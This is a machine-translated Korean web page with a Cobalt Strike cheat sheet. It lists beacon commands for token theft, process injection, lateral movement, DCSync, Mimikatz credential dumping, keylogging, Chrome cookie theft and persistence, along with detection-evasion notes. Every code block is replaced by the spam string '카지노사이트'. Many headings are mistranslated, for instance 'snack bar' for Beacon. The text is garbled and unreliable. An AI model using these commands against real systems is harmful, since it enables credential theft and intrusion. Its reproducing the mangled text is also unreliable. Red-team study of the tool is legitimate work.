콘텐츠로 이동

코발트 Strike Cheat 시트

제품정보

Cobalt Strike는 고급 위협 배우를 에뮬레이션하기 위해 설계된 상업 침투 테스트 및 빨간색 팀 운영 플랫폼입니다. 그것은 타협 시스템에 beacons (시약)을 배치 할 수 있도록 연산자를 허용하는 포스트 폭발 프레임 워크를 제공, 명령 및 제어 (C2) 채널을 설정, 다양한 공격 보안 작업을 수행.

· Warning: Cobalt Strike는 해당 환경에서만 사용되어야 하는 상업 보안 테스트 도구입니다.

핵심 부품

팀 서버

  • 중앙 명령 및 제어 서버
  • Linux에서 실행
  • 비콘 및 청취자 관리
  • 팀 운영을 위한 협업 제공

회사 소개

  • Java 기반 GUI 응용
  • Team Server에 연결
  • beacons과 상호 작용하는 통신수를 위한 공용영역
  • 대상 네트워크를 시각화

스낵 바

  • 포스트 폭발을 위한 1 차적인 탑재량
  • Team Server와의 통신 설정
  • 공격 작업에 대한 다양한 기능을 제공합니다
  • 다른 통신 형태에서 작동할 수 있습니다

설정 및 구성

팀 서버 설정

카지노사이트

고객 설정

카지노사이트

관심상품

Listeners 만들기

카지노사이트

Listener 유형

| | Type | Description | | | --- | --- | | | HTTP | Uses HTTP for C2 communication | | | | HTTPS | Uses HTTPS for C2 communication | | | | DNS | Uses DNS queries for stealthy C2 | | | | SMB | Uses named pipes for peer-to-peer C2 | | | | TCP | Uses direct TCP connections | | | | Foreign | Integrates with other C2 frameworks | |

Payload 생성

Beacon Payload 유형

카지노사이트

| | Payload Type | Description | | | --- | --- | | | Windows Executable | Standard .exe file | | | | Windows Service EXE | Service executable | | | | DLL | Dynamic Link Library | | | | PowerShell | PowerShell one-liner | | | | Python | Python script | | | | Office Macro | Macro for Office documents | | | | Shellcode | Raw shellcode | |

Artifact 키트

카지노사이트 - 증발 기술로 사용자 정의 페이로드 생성 - 검출을 피하기 위한 서명을 수정합니다. - 사용자 정의 템플릿

Beacon 명령

세션 관리

| | Command | Description | | | --- | --- | | | help | Display help information | | | | sleep [seconds] [jitter%] | Set sleep time and jitter | | | | checkin | Force immediate check-in | | | | exit | Terminate the beacon session | | | | clear | Clear the beacon's task queue | | | | jobs | List running jobs | | | | jobkill [JID] | Kill a running job | | | | mode dns | Switch to DNS mode | | | | mode dns-txt | Switch to DNS-TXT mode | | | | mode dns6 | Switch to DNS6 mode | | | | mode http | Switch to HTTP mode | | | | mode smb | Switch to SMB mode | |

정보 수집

| | Command | Description | | | --- | --- | | | hostname | Get the hostname | | | | ipconfig | Display network configuration | | | | netstat | Display network connections | | | | ps | List running processes | | | | tasklist | Alternative to ps | | | | getuid | Get current user ID | | | | whoami | Get detailed user information | | | | pwd | Print working directory | | | | drives | List available drives | | | | dir [directory] | List files in directory | | | | ls [directory] | Alternative to dir | | | | net [command] | Execute net command | | | | reg query [path] | Query registry | | | | sysinfo | Get system information | |

파일 작업

| | Command | Description | | | --- | --- | | | cd [directory] | Change directory | | | | cp [source] [destination] | Copy a file | | | | mkdir [directory] | Create a directory | | | | mv [source] [destination] | Move or rename a file | | | | rm [file] | Delete a file | | | | rmdir [directory] | Delete a directory | | | | cat [file] | Display file contents | | | | download [file] | Download a file from target | | | | upload [file] | Upload a file to target | | | | timestomp [file] [template] | Modify file timestamps | | | | ls-acl [file] | List file permissions | |

공정 운영

| | Command | Description | | | --- | --- | | | execute [program] | Execute without capturing output | | | | shell [command] | Execute and capture output | | | | run [program] | Execute a program | | | | runas [user] [password] [program] | Execute as another user | | | | pth [user] [domain] [hash] | Pass-the-hash to create a token | | | | steal_token [pid] | Steal token from process | | | | make_token [domain] [user] [password] | Create a token | | | | rev2self | Revert to original token | | | | getprivs | Enable system privileges | | | | getsystem | Attempt to get SYSTEM privileges | | | | execute-assembly [file.exe] | Execute .NET assembly in memory | | | | powerpick [command] | Execute PowerShell without powershell.exe | | | | powershell [command] | Execute PowerShell command | | | | psinject [pid] [command] | Execute PowerShell in specific process | | | | shinject [pid] [arch] [file.bin] | Inject shellcode into process | | | | dllinject [pid] [file.dll] | Inject DLL into process | | | | dllload [file.dll] | Load DLL in beacon process | |

옆 운동

| | Command | Description | | | --- | --- | | | psexec [target] [listener] | Use PsExec to deploy beacon | | | | psexec_psh [target] [listener] | Use PsExec with PowerShell | | | | winrm [target] [listener] | Use WinRM to deploy beacon | | | | wmi [target] [listener] | Use WMI to deploy beacon | | | | ssh [target:port] [user] [pass] [listener] | Use SSH to deploy beacon | | | | ssh-key [target:port] [user] [key] [listener] | Use SSH with key authentication | | | | dcsync [domain] [user] | Use DCSync to extract password hashes | | | | jump [method] [target] [listener] | Jump to target using specified method | | | | remote-exec [method] [target] [command] | Execute command on remote system | |

관련 상품

| | Command | Description | | | --- | --- | | | rportfwd [bind port] [forward host] [forward port] | Set up reverse port forward | | | | rportfwd stop [bind port] | Stop reverse port forward | | | | socks [port] | Start SOCKS proxy server | | | | socks stop | Stop SOCKS proxy server | | | | spunnel [host] [port] | Create encrypted tunnel over SMB | | | | spunnel stop | Stop encrypted tunnel | | | | covertvpn [interface] [IP/Mask] | Deploy Covert VPN interface | | | | covertvpn stop | Stop Covert VPN | | | | pivot [host] [port] | List pivot listeners | | | | pivotlistener [host] [port] | Create pivot listener | |

포스트 폭발

| | Command | Description | | | --- | --- | | | mimikatz [command] | Execute Mimikatz command | | | | hashdump | Dump password hashes | | | | logonpasswords | Dump credentials from memory | | | | keylogger [pid] | Start keylogger | | | | screenshot [pid] | Take screenshot | | | | screenwatch [pid] | Watch target's screen | | | | printscreen | Take screenshot using PrintScreen | | | | reg query [path] | Query registry | | | | powerview [command] | Execute PowerView command | | | | portscan [targets] [ports] [discovery method] | Scan for open ports | | | | browserpivot [pid] [port] | Hijack authenticated web sessions | | | | chromedump | Dump Chrome cookies and login data | | | | persist [method] [listener] | Set up persistence | | | | elevate [exploit] [listener] | Attempt privilege escalation | |

Malleable C2 단면도

기본 구조

카지노사이트

시험 단면도

카지노사이트

Aggressor 스크립트

기본 스크립트 구조

카지노사이트

일반적인 스크립트 기능

| | Function | Description | | | --- | --- | | | blog($1, "message") | Write to beacon console | | | | bshell($1, "command") | Execute shell command | | | | bpowershell($1, "command") | Execute PowerShell command | | | | bpowerpick($1, "command") | Execute PowerShell without powershell.exe | | | | bexecute_assembly($1, "/path/to/file.exe") | Execute .NET assembly | | | | bdllspawn($1, "/path/to/file.dll") | Inject Reflective DLL | | | | bpsexec($1, "target", "listener") | Execute PsExec lateral movement | | | | bwmi($1, "target", "listener") | Execute WMI lateral movement | | | | bwinrm($1, "target", "listener") | Execute WinRM lateral movement | |

옵션 정보 관련 기사

공정 사출

카지노사이트

Evasion 기술

카지노사이트

일반 작업 흐름

초기 액세스

ο 회원 관리

Privilege 확장

카지노사이트

Credential 수확

카지노사이트

옆 운동

카지노사이트

회사 소개

카지노사이트

지원하다